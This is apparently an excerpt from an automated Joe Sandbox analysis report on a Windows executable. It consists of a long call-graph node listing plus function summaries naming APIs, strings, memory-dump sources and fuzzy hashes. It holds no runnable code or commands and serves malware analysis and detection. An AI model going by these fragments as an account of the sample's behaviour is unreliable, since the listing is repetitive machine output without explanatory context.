7ff71eb11394 2 API calls 3058->3059 3060 7ff71eb114b8 3059->3060 3061 7ff71eb11394 2 API calls 3060->3061 3062 7ff71eb114c7 3061->3062 3063 7ff71eb11394 2 API calls 3062->3063 3064 7ff71eb114d6 3063->3064 3065 7ff71eb114e5 3064->3065 3066 7ff71eb11394 2 API calls 3064->3066 3067 7ff71eb11394 2 API calls 3065->3067 3066->3065 3068 7ff71eb114ef 3067->3068 3069 7ff71eb114f4 3068->3069 3070 7ff71eb11394 2 API calls 3068->3070 3071 7ff71eb11394 2 API calls 3069->3071 3070->3069 3072 7ff71eb114fe 3071->3072 3073 7ff71eb11503 3072->3073 3074 7ff71eb11394 2 API calls 3072->3074 3075 7ff71eb11394 2 API calls 3073->3075 3074->3073 3076 7ff71eb1150d 3075->3076 3077 7ff71eb11394 2 API calls 3076->3077 3078 7ff71eb11512 3077->3078 3079 7ff71eb11394 2 API calls 3078->3079 3080 7ff71eb11521 3079->3080 3081 7ff71eb11394 2 API calls 3080->3081 3082 7ff71eb11530 3081->3082 3083 7ff71eb11394 2 API calls 3082->3083 3084 7ff71eb1153f 3083->3084 3085 7ff71eb11394 2 API calls 3084->3085 3086 7ff71eb1154e 3085->3086 3087 7ff71eb11394 2 API calls 3086->3087 3088 7ff71eb1155d 3087->3088 3089 7ff71eb11394 2 API calls 3088->3089 3090 7ff71eb1156c 3089->3090 3091 7ff71eb11394 2 API calls 3090->3091 3092 7ff71eb1157b 3091->3092 3093 7ff71eb11394 2 API calls 3092->3093 3094 7ff71eb1158a 3093->3094 3095 7ff71eb11394 2 API calls 3094->3095 3096 7ff71eb11599 3095->3096 3097 7ff71eb11394 2 API calls 3096->3097 3098 7ff71eb115a8 3097->3098 3099 7ff71eb11394 2 API calls 3098->3099 3100 7ff71eb115b7 3099->3100 3101 7ff71eb11394 2 API calls 3100->3101 3102 7ff71eb115c6 3101->3102 3103 7ff71eb11394 2 API calls 3102->3103 3104 7ff71eb115d5 3103->3104 3105 7ff71eb115e4 3104->3105 3106 7ff71eb11394 2 API calls 3104->3106 3107 7ff71eb11394 2 API calls 3105->3107 3106->3105 3108 7ff71eb115f3 3107->3108 3108->2634 3109 7ff71eb11440 3108->3109 3110 7ff71eb11394 2 API calls 3109->3110 3111 7ff71eb1144f 3110->3111 3112 7ff71eb11394 2 API calls 3111->3112 3113 7ff71eb1145e 3112->3113 3114 7ff71eb11394 2 API calls 
3113->3114 3115 7ff71eb1146d 3114->3115 3116 7ff71eb11394 2 API calls 3115->3116 3117 7ff71eb1147c 3116->3117 3118 7ff71eb11394 2 API calls 3117->3118 3119 7ff71eb1148b 3118->3119 3120 7ff71eb11394 2 API calls 3119->3120 3121 7ff71eb1149a 3120->3121 3122 7ff71eb11394 2 API calls 3121->3122 3123 7ff71eb114a9 3122->3123 3124 7ff71eb11394 2 API calls 3123->3124 3125 7ff71eb114b8 3124->3125 3126 7ff71eb11394 2 API calls 3125->3126 3127 7ff71eb114c7 3126->3127 3128 7ff71eb11394 2 API calls 3127->3128 3129 7ff71eb114d6 3128->3129 3130 7ff71eb114e5 3129->3130 3131 7ff71eb11394 2 API calls 3129->3131 3132 7ff71eb11394 2 API calls 3130->3132 3131->3130 3133 7ff71eb114ef 3132->3133 3134 7ff71eb114f4 3133->3134 3135 7ff71eb11394 2 API calls 3133->3135 3136 7ff71eb11394 2 API calls 3134->3136 3135->3134 3137 7ff71eb114fe 3136->3137 3138 7ff71eb11503 3137->3138 3139 7ff71eb11394 2 API calls 3137->3139 3140 7ff71eb11394 2 API calls 3138->3140 3139->3138 3141 7ff71eb1150d 3140->3141 3142 7ff71eb11394 2 API calls 3141->3142 3143 7ff71eb11512 3142->3143 3144 7ff71eb11394 2 API calls 3143->3144 3145 7ff71eb11521 3144->3145 3146 7ff71eb11394 2 API calls 3145->3146 3147 7ff71eb11530 3146->3147 3148 7ff71eb11394 2 API calls 3147->3148 3149 7ff71eb1153f 3148->3149 3150 7ff71eb11394 2 API calls 3149->3150 3151 7ff71eb1154e 3150->3151 3152 7ff71eb11394 2 API calls 3151->3152 3153 7ff71eb1155d 3152->3153 3154 7ff71eb11394 2 API calls 3153->3154 3155 7ff71eb1156c 3154->3155 3156 7ff71eb11394 2 API calls 3155->3156 3157 7ff71eb1157b 3156->3157 3158 7ff71eb11394 2 API calls 3157->3158 3159 7ff71eb1158a 3158->3159 3160 7ff71eb11394 2 API calls 3159->3160 3161 7ff71eb11599 3160->3161 3162 7ff71eb11394 2 API calls 3161->3162 3163 7ff71eb115a8 3162->3163 3164 7ff71eb11394 2 API calls 3163->3164 3165 7ff71eb115b7 3164->3165 3166 7ff71eb11394 2 API calls 3165->3166 3167 7ff71eb115c6 3166->3167 3168 7ff71eb11394 2 API calls 3167->3168 3169 7ff71eb115d5 3168->3169 3170 7ff71eb115e4 3169->3170 3171 
7ff71eb11394 2 API calls 3169->3171 3172 7ff71eb11394 2 API calls 3170->3172 3171->3170 3173 7ff71eb115f3 3172->3173 3173->2634 3173->2646 3175 7ff71eb135c1 memset 3174->3175 3179 7ff71eb133c3 3174->3179 3178 7ff71eb135e6 3175->3178 3176 7ff71eb1343a memset 3176->3179 3177 7ff71eb1362b wcscpy wcscat wcslen 3180 7ff71eb11422 2 API calls 3177->3180 3178->3177 3179->3175 3179->3176 3181 7ff71eb13493 wcscpy wcscat wcslen 3179->3181 3188 7ff71eb1145e 2 API calls 3179->3188 3189 7ff71eb13579 3179->3189 3183 7ff71eb13728 3180->3183 3443 7ff71eb11422 3181->3443 3182 7ff71eb13767 3190 7ff71eb114c7 3182->3190 3183->3182 3512 7ff71eb11431 3183->3512 3187 7ff71eb1145e 2 API calls 3187->3182 3188->3179 3189->3175 3191 7ff71eb11394 2 API calls 3190->3191 3192 7ff71eb114d6 3191->3192 3193 7ff71eb114e5 3192->3193 3194 7ff71eb11394 2 API calls 3192->3194 3195 7ff71eb11394 2 API calls 3193->3195 3194->3193 3196 7ff71eb114ef 3195->3196 3197 7ff71eb114f4 3196->3197 3198 7ff71eb11394 2 API calls 3196->3198 3199 7ff71eb11394 2 API calls 3197->3199 3198->3197 3200 7ff71eb114fe 3199->3200 3201 7ff71eb11503 3200->3201 3202 7ff71eb11394 2 API calls 3200->3202 3203 7ff71eb11394 2 API calls 3201->3203 3202->3201 3204 7ff71eb1150d 3203->3204 3205 7ff71eb11394 2 API calls 3204->3205 3206 7ff71eb11512 3205->3206 3207 7ff71eb11394 2 API calls 3206->3207 3208 7ff71eb11521 3207->3208 3209 7ff71eb11394 2 API calls 3208->3209 3210 7ff71eb11530 3209->3210 3211 7ff71eb11394 2 API calls 3210->3211 3212 7ff71eb1153f 3211->3212 3213 7ff71eb11394 2 API calls 3212->3213 3214 7ff71eb1154e 3213->3214 3215 7ff71eb11394 2 API calls 3214->3215 3216 7ff71eb1155d 3215->3216 3217 7ff71eb11394 2 API calls 3216->3217 3218 7ff71eb1156c 3217->3218 3219 7ff71eb11394 2 API calls 3218->3219 3220 7ff71eb1157b 3219->3220 3221 7ff71eb11394 2 API calls 3220->3221 3222 7ff71eb1158a 3221->3222 3223 7ff71eb11394 2 API calls 3222->3223 3224 7ff71eb11599 3223->3224 3225 7ff71eb11394 2 API calls 3224->3225 3226 7ff71eb115a8 
3225->3226 3227 7ff71eb11394 2 API calls 3226->3227 3228 7ff71eb115b7 3227->3228 3229 7ff71eb11394 2 API calls 3228->3229 3230 7ff71eb115c6 3229->3230 3231 7ff71eb11394 2 API calls 3230->3231 3232 7ff71eb115d5 3231->3232 3233 7ff71eb115e4 3232->3233 3234 7ff71eb11394 2 API calls 3232->3234 3235 7ff71eb11394 2 API calls 3233->3235 3234->3233 3236 7ff71eb115f3 3235->3236 3236->2662 3238 7ff71eb12f88 3237->3238 3239 7ff71eb114a9 2 API calls 3238->3239 3240 7ff71eb12fd0 3239->3240 3240->2635 3242 7ff71eb12690 10 API calls 3241->3242 3243 7ff71eb1391e 3242->3243 3244 7ff71eb114a9 2 API calls 3243->3244 3263 7ff71eb13b21 3243->3263 3245 7ff71eb13967 3244->3245 3246 7ff71eb13b28 3245->3246 3579 7ff71eb114b8 3245->3579 3798 7ff71eb115c6 3246->3798 3249 7ff71eb13a87 memset 3633 7ff71eb1148b 3249->3633 3252 7ff71eb114b8 2 API calls 3253 7ff71eb1398f 3252->3253 3253->3249 3253->3252 3628 7ff71eb115d5 3253->3628 3257 7ff71eb114b8 2 API calls 3258 7ff71eb13b07 3257->3258 3258->3246 3259 7ff71eb13b0b 3258->3259 3741 7ff71eb1147c 3259->3741 3262 7ff71eb1145e 2 API calls 3262->3263 3263->2647 3268 7ff71eb182d0 3264->3268 3266 7ff71eb113b8 3267 7ff71eb113c6 NtAllocateUserPhysicalPages 3266->3267 3267->2703 3269 7ff71eb182ee 3268->3269 3272 7ff71eb1831b 3268->3272 3269->3266 3270 7ff71eb183c3 3271 7ff71eb183df malloc 3270->3271 3273 7ff71eb18400 3271->3273 3272->3269 3272->3270 3273->3269 3275 7ff71eb1266f memset 3274->3275 3275->2849 3340 7ff71eb1155d 3276->3340 3278 7ff71eb127f4 3279 7ff71eb114c7 2 API calls 3278->3279 3282 7ff71eb12816 3279->3282 3281 7ff71eb12785 wcsncmp 3361 7ff71eb114e5 3281->3361 3284 7ff71eb11503 2 API calls 3282->3284 3285 7ff71eb1283d 3284->3285 3287 7ff71eb12847 memset 3285->3287 3286 7ff71eb12d27 3289 7ff71eb12877 3287->3289 3288 7ff71eb128bc wcscpy wcscat wcslen 3290 7ff71eb1291a 3288->3290 3291 7ff71eb128ee wcslen 3288->3291 3289->3288 3292 7ff71eb12967 wcslen 3290->3292 3295 7ff71eb12985 3290->3295 3291->3290 3292->3295 3293 7ff71eb129d9 wcslen 3294 
7ff71eb114a9 2 API calls 3293->3294 3296 7ff71eb12a73 3294->3296 3295->3286 3295->3293 3297 7ff71eb114a9 2 API calls 3296->3297 3298 7ff71eb12bd2 3297->3298 3404 7ff71eb114f4 3298->3404 3301 7ff71eb114c7 2 API calls 3302 7ff71eb12c99 3301->3302 3303 7ff71eb114c7 2 API calls 3302->3303 3304 7ff71eb12cb1 3303->3304 3305 7ff71eb1145e 2 API calls 3304->3305 3306 7ff71eb12cbb 3305->3306 3307 7ff71eb1145e 2 API calls 3306->3307 3308 7ff71eb12cc5 3307->3308 3308->2846 3310 7ff71eb11394 2 API calls 3309->3310 3311 7ff71eb11521 3310->3311 3312 7ff71eb11394 2 API calls 3311->3312 3313 7ff71eb11530 3312->3313 3314 7ff71eb11394 2 API calls 3313->3314 3315 7ff71eb1153f 3314->3315 3316 7ff71eb11394 2 API calls 3315->3316 3317 7ff71eb1154e 3316->3317 3318 7ff71eb11394 2 API calls 3317->3318 3319 7ff71eb1155d 3318->3319 3320 7ff71eb11394 2 API calls 3319->3320 3321 7ff71eb1156c 3320->3321 3322 7ff71eb11394 2 API calls 3321->3322 3323 7ff71eb1157b 3322->3323 3324 7ff71eb11394 2 API calls 3323->3324 3325 7ff71eb1158a 3324->3325 3326 7ff71eb11394 2 API calls 3325->3326 3327 7ff71eb11599 3326->3327 3328 7ff71eb11394 2 API calls 3327->3328 3329 7ff71eb115a8 3328->3329 3330 7ff71eb11394 2 API calls 3329->3330 3331 7ff71eb115b7 3330->3331 3332 7ff71eb11394 2 API calls 3331->3332 3333 7ff71eb115c6 3332->3333 3334 7ff71eb11394 2 API calls 3333->3334 3335 7ff71eb115d5 3334->3335 3336 7ff71eb115e4 3335->3336 3337 7ff71eb11394 2 API calls 3335->3337 3338 7ff71eb11394 2 API calls 3336->3338 3337->3336 3339 7ff71eb115f3 3338->3339 3339->2848 3341 7ff71eb11394 2 API calls 3340->3341 3342 7ff71eb1156c 3341->3342 3343 7ff71eb11394 2 API calls 3342->3343 3344 7ff71eb1157b 3343->3344 3345 7ff71eb11394 2 API calls 3344->3345 3346 7ff71eb1158a 3345->3346 3347 7ff71eb11394 2 API calls 3346->3347 3348 7ff71eb11599 3347->3348 3349 7ff71eb11394 2 API calls 3348->3349 3350 7ff71eb115a8 3349->3350 3351 7ff71eb11394 2 API calls 3350->3351 3352 7ff71eb115b7 3351->3352 3353 7ff71eb11394 2 API calls 3352->3353 
3354 7ff71eb115c6 3353->3354 3355 7ff71eb11394 2 API calls 3354->3355 3356 7ff71eb115d5 3355->3356 3357 7ff71eb115e4 3356->3357 3358 7ff71eb11394 2 API calls 3356->3358 3359 7ff71eb11394 2 API calls 3357->3359 3358->3357 3360 7ff71eb115f3 3359->3360 3360->3278 3360->3281 3360->3286 3362 7ff71eb11394 2 API calls 3361->3362 3363 7ff71eb114ef 3362->3363 3364 7ff71eb114f4 3363->3364 3365 7ff71eb11394 2 API calls 3363->3365 3366 7ff71eb11394 2 API calls 3364->3366 3365->3364 3367 7ff71eb114fe 3366->3367 3368 7ff71eb11503 3367->3368 3369 7ff71eb11394 2 API calls 3367->3369 3370 7ff71eb11394 2 API calls 3368->3370 3369->3368 3371 7ff71eb1150d 3370->3371 3372 7ff71eb11394 2 API calls 3371->3372 3373 7ff71eb11512 3372->3373 3374 7ff71eb11394 2 API calls 3373->3374 3375 7ff71eb11521 3374->3375 3376 7ff71eb11394 2 API calls 3375->3376 3377 7ff71eb11530 3376->3377 3378 7ff71eb11394 2 API calls 3377->3378 3379 7ff71eb1153f 3378->3379 3380 7ff71eb11394 2 API calls 3379->3380 3381 7ff71eb1154e 3380->3381 3382 7ff71eb11394 2 API calls 3381->3382 3383 7ff71eb1155d 3382->3383 3384 7ff71eb11394 2 API calls 3383->3384 3385 7ff71eb1156c 3384->3385 3386 7ff71eb11394 2 API calls 3385->3386 3387 7ff71eb1157b 3386->3387 3388 7ff71eb11394 2 API calls 3387->3388 3389 7ff71eb1158a 3388->3389 3390 7ff71eb11394 2 API calls 3389->3390 3391 7ff71eb11599 3390->3391 3392 7ff71eb11394 2 API calls 3391->3392 3393 7ff71eb115a8 3392->3393 3394 7ff71eb11394 2 API calls 3393->3394 3395 7ff71eb115b7 3394->3395 3396 7ff71eb11394 2 API calls 3395->3396 3397 7ff71eb115c6 3396->3397 3398 7ff71eb11394 2 API calls 3397->3398 3399 7ff71eb115d5 3398->3399 3400 7ff71eb115e4 3399->3400 3401 7ff71eb11394 2 API calls 3399->3401 3402 7ff71eb11394 2 API calls 3400->3402 3401->3400 3403 7ff71eb115f3 3402->3403 3403->3278 3405 7ff71eb11394 2 API calls 3404->3405 3406 7ff71eb114fe 3405->3406 3407 7ff71eb11503 3406->3407 3408 7ff71eb11394 2 API calls 3406->3408 3409 7ff71eb11394 2 API calls 3407->3409 3408->3407 3410 
7ff71eb1150d 3409->3410 3411 7ff71eb11394 2 API calls 3410->3411 3412 7ff71eb11512 3411->3412 3413 7ff71eb11394 2 API calls 3412->3413 3414 7ff71eb11521 3413->3414 3415 7ff71eb11394 2 API calls 3414->3415 3416 7ff71eb11530 3415->3416 3417 7ff71eb11394 2 API calls 3416->3417 3418 7ff71eb1153f 3417->3418 3419 7ff71eb11394 2 API calls 3418->3419 3420 7ff71eb1154e 3419->3420 3421 7ff71eb11394 2 API calls 3420->3421 3422 7ff71eb1155d 3421->3422 3423 7ff71eb11394 2 API calls 3422->3423 3424 7ff71eb1156c 3423->3424 3425 7ff71eb11394 2 API calls 3424->3425 3426 7ff71eb1157b 3425->3426 3427 7ff71eb11394 2 API calls 3426->3427 3428 7ff71eb1158a 3427->3428 3429 7ff71eb11394 2 API calls 3428->3429 3430 7ff71eb11599 3429->3430 3431 7ff71eb11394 2 API calls 3430->3431 3432 7ff71eb115a8 3431->3432 3433 7ff71eb11394 2 API calls 3432->3433 3434 7ff71eb115b7 3433->3434 3435 7ff71eb11394 2 API calls 3434->3435 3436 7ff71eb115c6 3435->3436 3437 7ff71eb11394 2 API calls 3436->3437 3438 7ff71eb115d5 3437->3438 3439 7ff71eb115e4 3438->3439 3440 7ff71eb11394 2 API calls 3438->3440 3441 7ff71eb11394 2 API calls 3439->3441 3440->3439 3442 7ff71eb115f3 3441->3442 3442->3301 3444 7ff71eb11394 2 API calls 3443->3444 3445 7ff71eb11431 3444->3445 3446 7ff71eb11394 2 API calls 3445->3446 3447 7ff71eb11440 3446->3447 3448 7ff71eb11394 2 API calls 3447->3448 3449 7ff71eb1144f 3448->3449 3450 7ff71eb11394 2 API calls 3449->3450 3451 7ff71eb1145e 3450->3451 3452 7ff71eb11394 2 API calls 3451->3452 3453 7ff71eb1146d 3452->3453 3454 7ff71eb11394 2 API calls 3453->3454 3455 7ff71eb1147c 3454->3455 3456 7ff71eb11394 2 API calls 3455->3456 3457 7ff71eb1148b 3456->3457 3458 7ff71eb11394 2 API calls 3457->3458 3459 7ff71eb1149a 3458->3459 3460 7ff71eb11394 2 API calls 3459->3460 3461 7ff71eb114a9 3460->3461 3462 7ff71eb11394 2 API calls 3461->3462 3463 7ff71eb114b8 3462->3463 3464 7ff71eb11394 2 API calls 3463->3464 3465 7ff71eb114c7 3464->3465 3466 7ff71eb11394 2 API calls 3465->3466 3467 7ff71eb114d6 
3466->3467 3468 7ff71eb114e5 3467->3468 3469 7ff71eb11394 2 API calls 3467->3469 3470 7ff71eb11394 2 API calls 3468->3470 3469->3468 3471 7ff71eb114ef 3470->3471 3472 7ff71eb114f4 3471->3472 3473 7ff71eb11394 2 API calls 3471->3473 3474 7ff71eb11394 2 API calls 3472->3474 3473->3472 3475 7ff71eb114fe 3474->3475 3476 7ff71eb11503 3475->3476 3477 7ff71eb11394 2 API calls 3475->3477 3478 7ff71eb11394 2 API calls 3476->3478 3477->3476 3479 7ff71eb1150d 3478->3479 3480 7ff71eb11394 2 API calls 3479->3480 3481 7ff71eb11512 3480->3481 3482 7ff71eb11394 2 API calls 3481->3482 3483 7ff71eb11521 3482->3483 3484 7ff71eb11394 2 API calls 3483->3484 3485 7ff71eb11530 3484->3485 3486 7ff71eb11394 2 API calls 3485->3486 3487 7ff71eb1153f 3486->3487 3488 7ff71eb11394 2 API calls 3487->3488 3489 7ff71eb1154e 3488->3489 3490 7ff71eb11394 2 API calls 3489->3490 3491 7ff71eb1155d 3490->3491 3492 7ff71eb11394 2 API calls 3491->3492 3493 7ff71eb1156c 3492->3493 3494 7ff71eb11394 2 API calls 3493->3494 3495 7ff71eb1157b 3494->3495 3496 7ff71eb11394 2 API calls 3495->3496 3497 7ff71eb1158a 3496->3497 3498 7ff71eb11394 2 API calls 3497->3498 3499 7ff71eb11599 3498->3499 3500 7ff71eb11394 2 API calls 3499->3500 3501 7ff71eb115a8 3500->3501 3502 7ff71eb11394 2 API calls 3501->3502 3503 7ff71eb115b7 3502->3503 3504 7ff71eb11394 2 API calls 3503->3504 3505 7ff71eb115c6 3504->3505 3506 7ff71eb11394 2 API calls 3505->3506 3507 7ff71eb115d5 3506->3507 3508 7ff71eb115e4 3507->3508 3509 7ff71eb11394 2 API calls 3507->3509 3510 7ff71eb11394 2 API calls 3508->3510 3509->3508 3511 7ff71eb115f3 3510->3511 3511->3179 3513 7ff71eb11394 2 API calls 3512->3513 3514 7ff71eb11440 3513->3514 3515 7ff71eb11394 2 API calls 3514->3515 3516 7ff71eb1144f 3515->3516 3517 7ff71eb11394 2 API calls 3516->3517 3518 7ff71eb1145e 3517->3518 3519 7ff71eb11394 2 API calls 3518->3519 3520 7ff71eb1146d 3519->3520 3521 7ff71eb11394 2 API calls 3520->3521 3522 7ff71eb1147c 3521->3522 3523 7ff71eb11394 2 API calls 3522->3523 

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2163347669.00007FF71EB11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71EB10000, based on PE: true
                                                        • Associated: 00000000.00000002.2163329002.00007FF71EB10000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2163366945.00007FF71EB19000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2163387987.00007FF71EB1B000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2163409027.00007FF71EB1C000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2163809784.00007FF71ED97000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2163834082.00007FF71ED99000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2163863860.00007FF71ED9C000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff71eb10000_WWhhc3A0rs.jbxd
                                                        Similarity
                                                        • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                        • String ID:
                                                        • API String ID: 2643109117-0
                                                        • Opcode ID: 19a9fb927d1e6cd504815deac6584628b56f7f6ee1b9ed6be7109d8e51d185c5
                                                        • Instruction ID: 5ac715a068615ff3c2e8b1631be26b73b7433f8ec37b8e254b2f2db679ef80f5
                                                        • Opcode Fuzzy Hash: 19a9fb927d1e6cd504815deac6584628b56f7f6ee1b9ed6be7109d8e51d185c5
                                                        • Instruction Fuzzy Hash: 7A513835A09E4680FA31BB25F955BBDE3A2BF447B0F845035CA4D433A1DE2CB8598360

                                                        Control-flow Graph

                                                        APIs
                                                        • NtAllocateUserPhysicalPages.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71EB11156), ref: 00007FF71EB113F7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2163347669.00007FF71EB11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71EB10000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff71eb10000_WWhhc3A0rs.jbxd
                                                        Similarity
                                                        • API ID: AllocatePagesPhysicalUser
                                                        • String ID:
                                                        • API String ID: 889254806-0
                                                        • Opcode ID: 0328bc8ef6a53200854c36a9a6d061530187d3d5cbec243a2c25dcd54762ec6b
                                                        • Instruction ID: 836d7c8f89eac4d1f0aa2bb7fe9f4e8f8045725027e5cddf8129e0de0e753893
                                                        • Opcode Fuzzy Hash: 0328bc8ef6a53200854c36a9a6d061530187d3d5cbec243a2c25dcd54762ec6b
                                                        • Instruction Fuzzy Hash: 26F0C971A08F46C2DA34EB51F89492EB762FB483A0F404439E99D43725DF3CF0548B60
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2163347669.00007FF71EB11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71EB10000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff71eb10000_WWhhc3A0rs.jbxd
                                                        Similarity
                                                        • API ID: wcslen$memset$wcscat$wcscpy$_wcsnicmp$memcpy$_wcsicmp
                                                        • String ID:
                                                        • API String ID: 3604702941-3916222277
                                                        • Opcode ID: db90249458c669816813ce45624f7ae6fb86a0956b0c7d6c9660714c4cc28e67
                                                        • Instruction ID: 6cc750e7efb1bfc2e347e41d5e2886f61212c457f0b520ab35af7d92efdaf37d
                                                        • Opcode Fuzzy Hash: db90249458c669816813ce45624f7ae6fb86a0956b0c7d6c9660714c4cc28e67
                                                        • Instruction Fuzzy Hash: 76534921C2CEC684F732AB29AC016F8E761AF953B4F885235D98C575A5EF6D724CC324

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2163347669.00007FF71EB11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71EB10000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff71eb10000_WWhhc3A0rs.jbxd
                                                        Similarity
                                                        • API ID: memset$wcscatwcscpywcslen
                                                        • String ID: $0$0$@$@
                                                        • API String ID: 4263182637-1413854666
                                                        • Opcode ID: 6af65850cbe7cf858f5459e650824eeb499f5a742452982e0f30e052dc73b0d0
                                                        • Instruction ID: 0159b94231e7f2813d8854f9fffdb5cba708231d0afbb7602b132c8227a6c4c6
                                                        • Opcode Fuzzy Hash: 6af65850cbe7cf858f5459e650824eeb499f5a742452982e0f30e052dc73b0d0
                                                        • Instruction Fuzzy Hash: E7B17C2191CAC685F331AB25F8457EAF7A1FB80364F801235EAC8576A5EF7CE149CB10

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2163347669.00007FF71EB11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71EB10000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff71eb10000_WWhhc3A0rs.jbxd
                                                        Similarity
                                                        • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                        • String ID: 0$X$`
                                                        • API String ID: 329590056-2527496196
                                                        • Opcode ID: 3e74067d2b8f6d9820809deb9a400a2305a428e80b628bc07cd27e0f0585ba98
                                                        • Instruction ID: b897223f400764eebc7d42bc0a60f2975838e0b293a1d8bfc3e8b5f85ff0c07d
                                                        • Opcode Fuzzy Hash: 3e74067d2b8f6d9820809deb9a400a2305a428e80b628bc07cd27e0f0585ba98
                                                        • Instruction Fuzzy Hash: BD026922A08F8581E731AB19F8447AAB7A1FB857B4F814235DADC477A5DF3CE149C720

                                                        Control-flow Graph

                                                        APIs
                                                        • VirtualQuery.KERNEL32(?,?,?,?,00007FF71EB1A4C4,00007FF71EB1A4C4,?,?,00007FF71EB10000,?,00007FF71EB11991), ref: 00007FF71EB11C63
                                                        • VirtualProtect.KERNEL32(?,?,?,?,00007FF71EB1A4C4,00007FF71EB1A4C4,?,?,00007FF71EB10000,?,00007FF71EB11991), ref: 00007FF71EB11CC7
                                                        • memcpy.MSVCRT ref: 00007FF71EB11CE0
                                                        • GetLastError.KERNEL32(?,?,?,?,00007FF71EB1A4C4,00007FF71EB1A4C4,?,?,00007FF71EB10000,?,00007FF71EB11991), ref: 00007FF71EB11D23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2163347669.00007FF71EB11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71EB10000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff71eb10000_WWhhc3A0rs.jbxd
                                                        Similarity
                                                        • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                        • API String ID: 2595394609-2123141913
                                                        • Opcode ID: 7e47fe0a3cc757937b184265145bdf76f8034c5237edb91b9583e5a857b50cbf
                                                        • Instruction ID: 78eabde92d4e7f50668bb55ee6653f5a3672314d3f78810a7088abf2fa7e672a
                                                        • Opcode Fuzzy Hash: 7e47fe0a3cc757937b184265145bdf76f8034c5237edb91b9583e5a857b50cbf
                                                        • Instruction Fuzzy Hash: F5418061A08E5681EA31AB05F844ABDA7E2EB84BB0FD54132CE4D87791DE3CF54DC360

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2163347669.00007FF71EB11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71EB10000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff71eb10000_WWhhc3A0rs.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                        • String ID:
                                                        • API String ID: 3326252324-0
                                                        • Opcode ID: a73ea2713171e8a047f8eee55ea44c161dcaa9f159f1f4536ae8616b18553079
                                                        • Instruction ID: fc57a28b71966df3fcc3df0440cadc222d70d03fdd3ffe41cc97785a55ad23d3
                                                        • Opcode Fuzzy Hash: a73ea2713171e8a047f8eee55ea44c161dcaa9f159f1f4536ae8616b18553079
                                                        • Instruction Fuzzy Hash: 4921DB60E19E5681FA3ABB01F94077CA2A2BF10BB0FC54031C95D4B6A4DF2CB94ED361

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2163347669.00007FF71EB11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71EB10000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff71eb10000_WWhhc3A0rs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CCG
                                                        • API String ID: 0-1584390748
                                                        • Opcode ID: 1c404e41e50540ab740d17b3dba579019ccfa589ac9c58556def001b72d5d7d4
                                                        • Instruction ID: ad875ca3f5e0277d036c8f0830c4095a71875492733672a3fd570b8681085c07
                                                        • Opcode Fuzzy Hash: 1c404e41e50540ab740d17b3dba579019ccfa589ac9c58556def001b72d5d7d4
                                                        • Instruction Fuzzy Hash: 6821AE22F0D95641FA757354B580B7DA2D3AF84774FA48131D98D433D4CE2CF88A8261

                                                        Control-flow Graph

